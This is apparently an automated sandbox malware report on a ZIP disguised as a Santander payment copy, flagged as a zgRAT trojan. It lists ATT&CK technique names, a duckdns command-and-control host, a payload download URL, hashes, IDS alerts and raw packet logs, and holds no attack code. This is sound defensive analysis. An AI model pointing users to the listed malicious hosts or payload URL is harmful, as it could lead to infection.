                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets12
                    System Information Discovery                    		SSHKeylogging13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Rundll32                    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://sanel.net.pl0%Avira URL Cloudsafe
                    https://sanel.net.pl/filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wav0%Avira URL Cloudsafe
                    https://sanel.net.pl/filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wavKjA756As54Dspe82BtJ.0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    scaleofpreferencestill.duckdns.org
                    		194.226.169.227
                    		truetrue
                      		unknown
                      sanel.net.pl
                      		77.55.253.14
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://sanel.net.pl/filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wavfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netKopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://sanel.net.pl/filescontentgalleries/pictorialcoversoffiles/Fwudzwsfsp.wavKjA756As54Dspe82BtJ.Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000000.1281721765.0000000000C82000.00000002.00000001.01000000.00000006.sdmp, Kopia patnoci_Santander_TF1903218545300000564290004.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netiKopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://stackoverflow.com/q/14436606/23354InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/mgravell/protobuf-netJKopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameKopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1563050163.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/11564914/23354;Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/2152978/23354Kopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1579617292.0000000006E00000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2414775317.00000000036ED000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://sanel.net.plKopia platnosci_Santander_TF1903218545300000564290004.exe, 00000005.00000002.1563050163.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      194.226.169.227
                                      		scaleofpreferencestill.duckdns.orgRussian Federation
                                      		60837PKTRUtrue
                                      77.55.253.14
                                      		sanel.net.plPoland
                                      		15967NAZWAPLfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1573642
                                      Start date and time:2024-12-12 12:34:40 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 58s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip
                                      renamed because original name is a hash value
                                      Original Sample Name:Kopia patnoci_Santander_TF1903218545300000564290004.zip
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winZIP@4/0@5/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 90%
                                      • Number of executed functions: 259
                                      • Number of non-executed functions: 12
                                      Cookbook Comments:
                                      • Found application associated with file extension: .zip

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      06:35:22API Interceptor49x Sleep call for process: Kopia platnosci_Santander_TF1903218545300000564290004.exe modified
                                      06:35:50API Interceptor155567x Sleep call for process: InstallUtil.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      77.55.253.14https://dontcrydesignlab.com/reports.phpGet hashmaliciousUnknownBrowse
                                        RFQ_418430000056120000580.exeGet hashmaliciousUnknownBrowse
                                          RFQ_418430000056120000580.exeGet hashmaliciousUnknownBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            sanel.net.plRFQ_418430000056120000580.exeGet hashmaliciousUnknownBrowse
                                            • 77.55.253.14
                                            RFQ_418430000056120000580.exeGet hashmaliciousUnknownBrowse
                                            • 77.55.253.14

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NAZWAPLsora.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 85.128.200.14
                                            la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                            • 77.55.62.124
                                            sora.sh4.elfGet hashmaliciousMiraiBrowse
                                            • 85.128.200.52
                                            botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 85.128.184.218
                                            https://dontcrydesignlab.com/reports.phpGet hashmaliciousUnknownBrowse
                                            • 77.55.253.14
                                            B6eg13TpEH.elfGet hashmaliciousUnknownBrowse
                                            • 85.128.224.42
                                            belks.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 85.128.224.45
                                            belks.x86.elfGet hashmaliciousMiraiBrowse
                                            • 85.128.224.39
                                            la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                            • 77.55.14.212
                                            #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 77.55.252.166

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29tGet hashmaliciousUnknownBrowse
                                            • 77.55.253.14
                                            RQ--029.msiGet hashmaliciousAteraAgentBrowse
                                            • 77.55.253.14
                                            3d#U0438.htaGet hashmaliciousUnknownBrowse
                                            • 77.55.253.14
                                            Agreement for Cooperation.PDF.lnk.download.lnkGet hashmaliciousRedLineBrowse
                                            • 77.55.253.14
                                            RFQ-004282A.Teknolojileri A.S.exeGet hashmaliciousAgentTeslaBrowse
                                            • 77.55.253.14
                                            Strait STS.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 77.55.253.14
                                            Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                            • 77.55.253.14
                                            https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwEGet hashmaliciousPureLog StealerBrowse
                                            • 77.55.253.14
                                            https://owotabua.cloudfederalservices.com/F3A4kGet hashmaliciousUnknownBrowse
                                            • 77.55.253.14

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            No created / dropped files found

                                            Static File Info

                                            General

                                            File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                            Entropy (8bit):5.509746010514536
                                            TrID:
                                            • ZIP compressed archive (8000/1) 100.00%
                                            File name:Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip
                                            File size:580'726 bytes
                                            MD5:3a201ad107aa7fc528dbec6a21956e13
                                            SHA1:458b00eb63f11169b0cca5fe64de597e1918b1d2
                                            SHA256:949f324ce7dbcaaa19bc2a8dd8b2a5a5ad6f75fed88486023493c79f1336d83d
                                            SHA512:b9ea94bdde8c79237649ff68636462d27eefbcd74461cc4c276f0d98e39051b37b55c27280a3c3365c8859bde9fa9e2fcb83a3a8970fe0af47a0250735d0de22
                                            SSDEEP:6144:7IWJGOZCXXfxZSECow4UMmi296jEnFE85S5I6D3hNcbQoTS/:77GOZWPnSrTMmQjEFT+I6D2Xs
                                            TLSH:14C4C09ADEC71E8FC944807183760FB12BD58471794CAF13ABB4961E8DBB250CC978AD
                                            File Content Preview:PK.........R.Y.!.O........9.D.Kopia p.atno.ci_Santander_TF1903218545300000564290004.exeup@..fm..Kopia p..atno..ci_Santander_TF1903218545300000564290004.exe.].\.]._6..N.....9.N.[....Q.L..QPDPTT.....3v+&*........[.....y....'.s....l..9".H$.....[$: ..5..._...

                                            File Icon

                                            Icon Hash:1c1c1e4e4ececedc

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-12-12T12:35:51.809684+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649705194.226.169.2275180TCP
                                            2024-12-12T12:35:54.107890+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649706194.226.169.2275180TCP
                                            2024-12-12T12:35:56.400795+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649707194.226.169.2275180TCP
                                            2024-12-12T12:35:58.700902+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649708194.226.169.2275180TCP
                                            2024-12-12T12:36:01.002646+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649710194.226.169.2275180TCP
                                            2024-12-12T12:36:03.310061+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649711194.226.169.2275180TCP
                                            2024-12-12T12:36:05.622946+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649712194.226.169.2275180TCP
                                            2024-12-12T12:36:07.915697+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649713194.226.169.2275180TCP
                                            2024-12-12T12:36:10.214479+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649714194.226.169.2275180TCP
                                            2024-12-12T12:36:12.528904+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649715194.226.169.2275180TCP
                                            2024-12-12T12:36:14.826208+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649716194.226.169.2275180TCP
                                            2024-12-12T12:36:17.413019+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649717194.226.169.2275180TCP
                                            2024-12-12T12:36:19.697745+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649718194.226.169.2275180TCP
                                            2024-12-12T12:36:21.994948+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649719194.226.169.2275180TCP
                                            2024-12-12T12:36:24.311542+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649720194.226.169.2275180TCP
                                            2024-12-12T12:36:26.607550+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649722194.226.169.2275180TCP
                                            2024-12-12T12:36:28.900444+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649723194.226.169.2275180TCP
                                            2024-12-12T12:36:31.198428+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649724194.226.169.2275180TCP
                                            2024-12-12T12:36:33.513996+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649725194.226.169.2275180TCP
                                            2024-12-12T12:36:35.808481+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649726194.226.169.2275180TCP
                                            2024-12-12T12:36:38.123423+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649727194.226.169.2275180TCP
                                            2024-12-12T12:36:40.417127+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649728194.226.169.2275180TCP
                                            2024-12-12T12:36:42.734447+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649729194.226.169.2275180TCP
                                            2024-12-12T12:36:45.045259+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649730194.226.169.2275180TCP
                                            2024-12-12T12:36:47.345856+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649731194.226.169.2275180TCP
                                            2024-12-12T12:36:49.635716+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649732194.226.169.2275180TCP
                                            2024-12-12T12:36:52.303991+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649733194.226.169.2275180TCP
                                            2024-12-12T12:36:54.590046+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649734194.226.169.2275180TCP
                                            2024-12-12T12:36:56.890395+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649735194.226.169.2275180TCP
                                            2024-12-12T12:36:59.183334+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649736194.226.169.2275180TCP
                                            2024-12-12T12:37:01.499003+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649737194.226.169.2275180TCP
                                            2024-12-12T12:37:03.811649+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649738194.226.169.2275180TCP
                                            2024-12-12T12:37:06.106517+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649739194.226.169.2275180TCP
                                            2024-12-12T12:37:08.405096+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649740194.226.169.2275180TCP
                                            2024-12-12T12:37:10.702359+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649741194.226.169.2275180TCP
                                            2024-12-12T12:37:12.995734+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649742194.226.169.2275180TCP
                                            2024-12-12T12:37:15.294241+01002858531ETPRO MALWARE Win32/zgRAT CnC Checkin1192.168.2.1649743194.226.169.2275180TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 12, 2024 12:35:24.492252111 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:24.492296934 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:24.492368937 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:24.503137112 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:24.503165960 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:25.914875984 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:25.914975882 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:25.917027950 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:25.917038918 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:25.917550087 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:25.960936069 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:25.966324091 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.011337042 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.449244022 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.449273109 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.449280024 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.449479103 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.449508905 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.502938986 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.560862064 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.560877085 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.560909033 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.560977936 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.561007023 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.645689011 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.645703077 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.645793915 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.679320097 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.679332972 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.679394960 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.704790115 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.704804897 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.704880953 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.736680984 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.736718893 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.736850023 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.827713013 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.827996016 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.842739105 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.842829943 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.861016035 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.861083984 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.874530077 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.874602079 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.886910915 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.887130976 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.896076918 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.896147966 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.908551931 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.908617020 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:26.948573112 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:26.948667049 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.020689964 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.020772934 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.028830051 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.028959036 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.038702965 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.038779020 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.045872927 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.045958996 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.052953005 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.053015947 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.060101032 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.060178041 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.069566965 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.069675922 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.075503111 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.075572968 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.080720901 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.080802917 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.087493896 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.087560892 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.092804909 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.092876911 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.097985029 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.098098993 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.115745068 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.115817070 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.131577015 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.131661892 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.211715937 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.211808920 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.217395067 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.217474937 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.221359015 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.221453905 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.227549076 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.227632999 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.232292891 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.232367039 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.237194061 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.237291098 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.241980076 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.242054939 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.248210907 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.248301983 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.253038883 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.253112078 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.258630037 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.258708954 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.263129950 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.263209105 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.268151999 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.268232107 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.273323059 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.273396969 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.277467966 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.277548075 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.323396921 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.323492050 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.401664019 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.401776075 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.404433966 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.404525995 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.407809019 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.407888889 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.411035061 CET4434970477.55.253.14192.168.2.16
                                            Dec 12, 2024 12:35:27.411142111 CET49704443192.168.2.1677.55.253.14
                                            Dec 12, 2024 12:35:27.415237904 CET4434970477.55.253.14192.168.2.16
